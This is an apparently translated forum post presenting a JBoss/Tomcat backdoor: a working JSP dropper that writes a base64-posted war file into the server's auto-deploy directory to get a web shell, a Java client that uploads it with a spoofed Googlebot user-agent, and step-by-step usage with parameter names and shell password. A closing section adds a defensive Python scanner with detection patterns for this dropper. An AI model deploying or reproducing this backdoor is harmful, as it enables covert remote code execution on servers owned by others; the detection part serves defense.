Someone in the community posted a JBoss backdoor that works by auto-deploying a war file and asked how this backdoor is used
Quite clever: servers generally provide an auto-deployment service, which means all you have to do is drop the war package into the directory that is auto-deployed by default.

POST to: http://xxx.com/xxx.jsp
Parameters:
pUBYyDsT=<Base64 encoding of the war file>&oAEICWIo=Test
Then request http://xxx.com/Test and you have a shell. Test is the war file's project name (its context root).

Simply changing the property name passed to getProperty makes it work on Tomcat and other servers as well.

Client tool:
Upload_War_后门.jar
iswin.war



Source:

```java
// Swing event handlers from the client's form class (fragment, not a complete class).
// jTextField1 holds the backdoor URL, jTextField2 the war project name,
// jTextField3 the local war path; jTextArea1 shows the result.
// Imports the fragment relies on (Jsoup is a third-party dependency):
import java.awt.event.ActionEvent;
import java.io.*;
import java.util.HashMap;
import java.util.Map;
import javax.swing.JFileChooser;
import javax.swing.filechooser.FileSystemView;
import org.jsoup.Jsoup;
import sun.misc.BASE64Encoder;

private void jButton1ActionPerformed(ActionEvent evt) {
    String war = jTextField3.getText();
    if (war != null) {
        try {
            // Read the whole war file into memory and base64-encode it
            FileInputStream fis = new FileInputStream(new File(war));
            byte[] b = new byte[1024];
            int n = 0;
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            while ((n = fis.read(b)) != -1) {
                baos.write(b, 0, n);
            }
            String content = new BASE64Encoder().encode(baos.toByteArray());
            fis.close();
            // Form fields: oAEICWIo = project name, pUBYyDsT = base64 war
            Map<String, String> map = new HashMap<String, String>();
            map.put("oAEICWIo", jTextField2.getText());
            map.put("pUBYyDsT", content);
            Jsoup.connect(jTextField1.getText()).data(map).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(30000).post();
            jTextArea1.setText("请求成功...");
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        }
    }
}

private void jButton2ActionPerformed(ActionEvent evt) {
    int result = 0;
    String path = null;
    // Let the user pick the local war file and put its path into jTextField3
    JFileChooser fileChooser = new JFileChooser();
    FileSystemView fsv = FileSystemView.getFileSystemView();
    fileChooser.setCurrentDirectory(fsv.getHomeDirectory());
    fileChooser.setDialogTitle("请选择war文件.");
    fileChooser.setApproveButtonText("确定");
    fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);
    result = fileChooser.showOpenDialog(fileChooser);
    if (JFileChooser.APPROVE_OPTION == result) {
        path = fileChooser.getSelectedFile().getPath();
    }
    jTextField3.setText(path);
}
```

The modified z7y.jsp backdoor:

```jsp
<%@page import="java.io.*,java.util.*,sun.misc.BASE64Decoder" %>
<%!
// Choose the container's auto-deploy directory from the server banner.
// The fallback is Tomcat's catalina.home, which is what makes the page portable.
String getServer(HttpServletRequest request, String name) {
    if (name.indexOf("jboss") != -1) {
        return System.getProperty("jboss.server.home.dir") + "/deploy/";
    } else if (name.indexOf("jetty") != -1) {
        return System.getProperty("jetty.home") + "/webapps/";
    } else if (name.indexOf("resin") != -1) {
        return System.getProperty("resin.home") + "/webapps/";
    }
    return System.getProperty("catalina.home") + "/webapps/";
}
%>
<%
String PJdpj = request.getParameter("pUBYyDsT");
if (PJdpj != null) {
    try {
        // Decode the base64 payload and write it as <oAEICWIo>.war into the deploy directory
        String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll("\\\\", "/") + request.getParameter("oAEICWIo") + ".war";
        FileOutputStream twkH = new FileOutputStream(RSVw);
        twkH.write(new BASE64Decoder().decodeBuffer(PJdpj));
        twkH.close();
        // As written this targets "<name>.war.war", which never exists, so the delete is a no-op
        String dhkDS = RSVw + ".war";
        new File(dhkDS).delete();
    } catch (Exception e) {
    }
}
%>
```

Request: http://localhost:8080/iswin/index.jsp  Password: 023
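A defender-side check for this pattern, added here as an example and not part of the original post or its tools: it scans JSP source text for the combination of indicators that z7y.jsp shows (base64-decoding a request parameter, writing the bytes to disk, target path built from a container home property). The two sample JSPs are constructed; the dropper sample is a trimmed copy of the logic above, and the indicator names are my own.

```python
import re

# Property keys are the ones z7y.jsp resolves the deploy directory from.
DEPLOY_PROPERTIES = ("jboss.server.home.dir", "jetty.home", "resin.home", "catalina.home")

INDICATORS = {
    # payload arrives base64-encoded (sun.misc or java.util decoders)
    "base64_decode": re.compile(r"BASE64Decoder|Base64\.getDecoder|decodeBuffer"),
    # data comes from a request parameter
    "request_param": re.compile(r"request\.getParameter\("),
    # decoded bytes are written to disk
    "file_write": re.compile(r"FileOutputStream|Files\.write"),
    # destination path is derived from a container home/deploy property
    "deploy_property": re.compile(
        r'getProperty\(\s*"(%s)"\s*\)' % "|".join(re.escape(p) for p in DEPLOY_PROPERTIES)),
}


def scan_jsp(source: str) -> dict:
    """Return per-indicator hits and a verdict: all four together is the dropper signature.

    Any single indicator is common in benign code (upload forms decode base64 and write
    files); the combination with a container-home property is what stands out.
    """
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    return {"indicators": hits, "war_dropper": all(hits.values())}


# Constructed samples: a trimmed copy of the z7y.jsp logic and a harmless JSP.
DROPPER_SAMPLE = r'''<%@page import="java.io.*,sun.misc.BASE64Decoder"%>
<% String p = request.getParameter("pUBYyDsT");
   String dir = System.getProperty("catalina.home") + "/webapps/";
   FileOutputStream f = new FileOutputStream(dir + request.getParameter("oAEICWIo") + ".war");
   f.write(new BASE64Decoder().decodeBuffer(p)); f.close(); %>'''

BENIGN_SAMPLE = r'''<%@page import="java.util.*"%>
<% String name = request.getParameter("name");
   out.println("Hello, " + (name == null ? "guest" : name)); %>'''

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_jsp(src))
```

Run it over every .jsp under a container's webapps tree; a hit on all four indicators warrants a manual look, and any .war appearing in deploy/ or webapps/ outside a release window should be checked against the same signature.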